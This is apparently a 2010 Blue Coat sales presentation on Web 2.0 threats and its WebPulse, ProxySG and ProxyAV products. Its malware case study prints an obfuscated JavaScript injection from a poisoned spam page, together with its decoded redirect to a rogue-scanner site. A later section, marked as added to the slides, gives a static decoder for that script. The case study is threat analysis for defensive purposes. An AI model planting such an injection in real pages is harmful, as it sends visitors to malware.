Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners.
© Blue Coat Systems, Inc. 2010. All Rights Reserved.
Living in a Web 2.0 World (and how BCSI can help!)
Mark Stanford, SE Manager
20110 Ashbrook Place, Suite 275, Ashburn, VA 20147, (703) 857-2100, www.geobridge.net
Agenda
Definition of Web 2.0 Overview Real World Web 2.0 application and threat examples BCSI countermeasures: Layered Security Defenses
What is Web 2.0?
Applications & Services
Technologies & Programming Languages
Software & Systems
Web Evolution
Diagram labels: Interactive Pages; Community Model; Multi-Host Pages; Static Pages; Dynamic Pages; Publishing Model; Single Host Pages; Nice to Have; Must Have
Cyber Crime Evolution
Diagram labels: Invisible; Data Collection/Identity; Profit Driven; Wide-spread, Fast; Visible, DoS; Damage/Defacement; Ingenuity/Pride Driven; Amateurs; Professionals; Targeted
Web 2.0
Did NOT change…
the OSI model
the way IP addresses work
the way URLs are handled
the way Web Filtering works
DID change…
how information gets posted, even on legitimate sites
how information may be presented
By 2012 the Internet will be 75X larger than in 2002
What is required to find/identify threats on the web
Web 2.0 Also Means 1 URL Leads to Many
12 Domains, 130 URLs (www.cnn.com, 31.03.2010, 10:12 a.m. German Time)
12 Domains, 246 URLs (www.bild.de, 31.03.2010, 10:17 a.m. German Time)
Web 2.0 and Search Engines
www Search Engine View
Forums, Blogs, Wikis, Guestbooks
Malware Case Study
WebPulse saw a new referrer…
Nothing here…
<html><head><title>Install Keys Satellite</title><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="robots" content="index, follow" /></head><body bgcolor=#59746>
<style>body { font-family: verdana; margin: 10px 100px;}</style><h3>Install Keys Satellite</h3><strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex <i>install linux suse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size: 16px;">have vb setup install jmail</font> axle install hellwig ghetto install s forum apron front sink install <u>tiger wood install</u> <b>install cobra fatty freeway bars</b> plasma install <strong>adaptec tape install</strong> <font color=#7B6DAC style="font-size: 12px;">remote install software</font> cnps 9500 install install modular plug rj45 <strong>can't install program</strong> <font color=#68D71E size=14>how to install neon tubes</font> <i>how to install themes for mac</i> 2003 install microsoft office <i>msdos install system</i> <b>software install through active directory</b> install vcr to dish network <strong>nero startsmart install error</strong> <b>blat install syntax</b> <i>dell workstation 360n install cpu</i> install setup install tunnel protectors <u>project 2007 how to install</u> <font color=#D8B88A style="font-size: 18px;">self install fire pit</font> <strong>install grub dual boot</strong> <b>deluxe install prizm pro</b> <b>how to install a window shutter</b> <b>install laminate over existing counter top</b> <font color=#41FE63 style="font-size: 12px;">linksys 54g install</font>
So… How did the User get there?
Interesting…
<html><head><title>Install Keys Satellite</title><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="robots" content="index, follow" /></head><body bgcolor=#59746><script language="javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%0D%0A%7D%0D%0A%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00tubcjmjuzjofutdbo/dpn0ijujo/qiq%264Gmboe%264E31%2637bggje%264E27%3A11%2633%264C%264D0tdsjqu%264F1');</script><style>body { font-family: verdana; margin: 10px 100px;}</style><h3>Install Keys Satellite</h3><strong>install clear xbox controller</strong> <i>install remove lexus power window</i> audio install honda civic 2007 ex <i>install linux suse on new computer</i> <u>install electronic diary</u> install cs3 in vista <i>install warehouse shelving</i> <strong>hp deskjet 5550 install software</strong> valve relief chevy piston install <i>install patrol air filter</i> no install lock folders <b>how to install mailbox garage door</b> <font color=#9D17E style="font-size:
<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1));var t=""; for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write (unescape(t));}</script>
<script>document.location="http://stabilityinetscan.com/hitin.php?land=20&affid=169";</script>
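Added example (not part of the original slides): a static decoder for the dF() layer shown above, which returns the hidden script as text instead of passing it to document.write() and then pulls out the redirect target. The function names decodeDF, extractRedirects and analyzePage are assumptions made for this example; the sample string is the dF() argument from the slide.

```javascript
// Added example (not from the original deck): decode the dF() layer statically.

// Percent-decode %XX sequences, matching what legacy unescape() does for
// the input on the slide (the %uXXXX form is not used there).
function percentDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Mirror of dF(): the last character is the shift key; the remainder is
// percent-decoded, every char code is lowered by the key, and the result is
// percent-decoded again. The text is returned, never written to a document.
function decodeDF(s) {
  const keyChar = s.slice(-1);
  if (!/^[0-9]$/.test(keyChar)) throw new Error('dF key is not a digit');
  const key = Number(keyChar);
  const stage1 = percentDecode(s.slice(0, -1));
  let shifted = '';
  for (let i = 0; i < stage1.length; i++) {
    shifted += String.fromCharCode(stage1.charCodeAt(i) - key);
  }
  return percentDecode(shifted);
}

// Extract redirect targets from decoded script text for logging or blocking.
function extractRedirects(decoded) {
  const re = /(?:document|window)\.location(?:\.href)?\s*=\s*["']([^"']+)["']/g;
  return Array.from(decoded.matchAll(re), (m) => m[1]);
}

// Scan page source for dF('...') calls and report what each one decodes to.
function analyzePage(html) {
  return Array.from(html.matchAll(/\bdF\(\s*'([^']*)'\s*\)/g), (m) => {
    const decoded = decodeDF(m[1]);
    return { decoded, redirects: extractRedirects(decoded) };
  });
}

// The dF() argument exactly as it appears in the injected script on the slide.
const SLIDE_SAMPLE = "<script>dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633" +
  "iuuq%264B00tubcjmjuzjofutdbo/dpn0ijujo/qiq%264Gmboe%264E31%2637bggje%264E27" +
  "%3A11%2633%264C%264D0tdsjqu%264F1');</script>";

for (const hit of analyzePage(SLIDE_SAMPLE)) {
  console.log(hit.decoded, hit.redirects);
}
```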
“A friendly piece of advice…”
“You are in trouble…”
“This is very serious”
Web 2.0 Examples - Twitter
Still a toy or already a tool?
Web 2.0 Examples - Mashups
Web 2.0 Examples - Facebook
Still a toy or already a tool?
Koobface worm (January 2009)
Invitation to click on a link in the Facebook or Myspace inbox
Supposedly a link to a funny video
Users were told that they had to update their Flash player to view the video
The installed software was a proxy server
Now selected traffic could be redirected to the attacker
A second program to download and install arbitrary code was installed, too
Like magic, the infected computer is now a zombie, under the control of unknown villains
Changing Web Habits
Top 10 Categories – 2009
WebFilter/WebPulse, 62M+ Users
1. Social Networking
2. Web Advertisements
3. Search Engines/Portals
4. Personals/Dating
5. Pornography
6. Computers/Internet
7. Audio/Video Clips
8. Adult/Mature Content
9. Web Email
10. Illegal/Questionable
Social Networking
• Moved to #1 from #2 position
• Represents 25% of Top 10 requests
Web Email
• Dropped to #9 from #5 position
• Users migrating to social networking
Cyber Crime Leverages
• Search engine poisoning
• Fake AV and Codec updates
• Popular site injections
• Death, Drama & Disaster lures
• Health & Wealth scams
Layered Security Defenses
Blue Coat Layered Defenses
Cloud Service: WebPulse & WebFilter
Inline Threat Detection: ProxyAV
Web Application & Content Controls: ProxySG
Integrated Data Loss Prevention: ProxySG with 6 DLP partners
Remote Users: ProxyClient
Hybrid Design
Architected to Deliver On-Demand Security Intelligence
• Industry’s leading collaborative cloud defense with 62M users
• Real-time inputs of any new web content and dynamic links
• Web protection, visibility, and reporting in any location
Web Gateway Protection
• Inline threat analysis w/SSL
• Web filtering & content controls
• Media optimization + B/W Mgmt
Cloud Defenses
• Real-time web content ratings
• Web threat & malware detection
• Reputation ratings
URL Filtering & Reporting
Cloud threat protection
Diagram labels: WAN; ProxySG & ProxyAV; WebFilter; WebPulse; ProxyClient; Remote Users; Reporter; Web
Blue Coat Secure Web Gateway
Diagram labels: Malware Scanning; Protocol Compliance; Content Filters; Data Types; Active Content; URL Filtering; AAA Policy; Certificate Validation; Method Controls; BCWF; WebPulse; Reporter; Log Files; Object Cache; Bandwidth Management; Protocol Optimization
ProxyAV:
- Behavior based analysis
- Signatures
Preserve Productivity
BCWF Malware Identification Strategy
Dynamic Link Analysis
A. Popular Web Site Pointers
B. Middle Relay Servers & Link Farms
C. Malware Download Hosts
Dynamic Link Analysis
Cloud connected community that is broad and diverse
Real-time input of new web links to the cloud service
Immediate analysis of URL chain for threats & rating
Update master database in cloud to protect all members
Cloud Community
Dynamic Link Analysis
Cloud connected community that is broad and diverse
Real-time input of new web links to the cloud service
Immediate analysis of full link chain for threats & rating
Update master database in cloud to protect all members
Protects
Web Gateways
Remote Users
Cloud Community
WebPulse: First Complete DLA solution
New defense layer
Full Dynamic link analysis
Foundation for next generation URL filtering
Fast, Aware, Protective… for anyone, anywhere
Protects
Web Gateways
Remote Users
Cloud Community
WebPulse: 62M Users
WebFilter: 2B reqs/week
ProxySG
ProxyClient
K9
K-9 Web Protect, ProxyClient, ProxySG, ProxyAV
BCWF Full List
• 16 Sources
• Signatures
• Behavior
• Heuristics
• Reputation
• Sandboxing
Threat Analysis
Deep Background Rating Analysis (DBRA)
• 2 Secs – 2hrs
• RTT Balanced
URL Malware
• “Uncategorized” sent to WebPulse for Dynamic categorization
• 62M+ User Community
• 45B+ requests/week
• Fully Configurable and Secure
• 5 Min for security updates
Rating Servers
• 300M Unique requests daily
• 1.2B requests “rated” weekly
• 50 languages
• Fast (ms) – try it!
Diagram labels: Real Time Boundary; WebPulse Clients; WebPulse Cloud Service; Dynamic URL Cache; URL & Content Trainers; ANZ; Master Rating Database VA; CA; HK; UK
ProxyAV: Co-Processor Architecture
Improved utilization with M:N ratio
Higher throughput per gateway
Results in less hardware (with new AV HW: always 1 SG – 1 AV sizing possible)
Optimized design
Dual Cache Design
• Clean Object Cache
• Finger Print Cache
• Patience Page
• Trickle First
• Trickle Last
• Defer Scan (media)
ICAP, ICAP+, S-ICAP
Diagram labels: Enterprise Network; Internet; ProxySG; ProxyAV
ProxyAV – anti-malware features
Don’t get confused by the name “AV”
Anti-malware features are more comprehensive than traditional pattern matching technologies
• Behavioral analysis
• Sandboxing
• Heuristics
• True file type detection
• Etc.
ProxyAV vs. competitors: Aurora exploit (CVE-2010-0249)
Note: Finjan was not able to block the exploit without a security update
It is a different approach and philosophy
ProxyClient included with WebFilter
Remote Filtering Cloud Connected Threat Protection Acceleration Central Policy Reporting
Why Blue Coat Products?
Unmatched policy controls & authentication options
Proactive Malware/MMC detection
Real-time web content analysis/DLA for gateway & client
URL database, threat detection, and DLP partners
Custom object-based OS with patented cache technologies
Broad proxy library & acceleration techniques
Bandwidth management & protocol optimization/compliance
Experience, Reliability, Performance
All the RIGHT parts!
Blue Coat Confidential Information
Questions?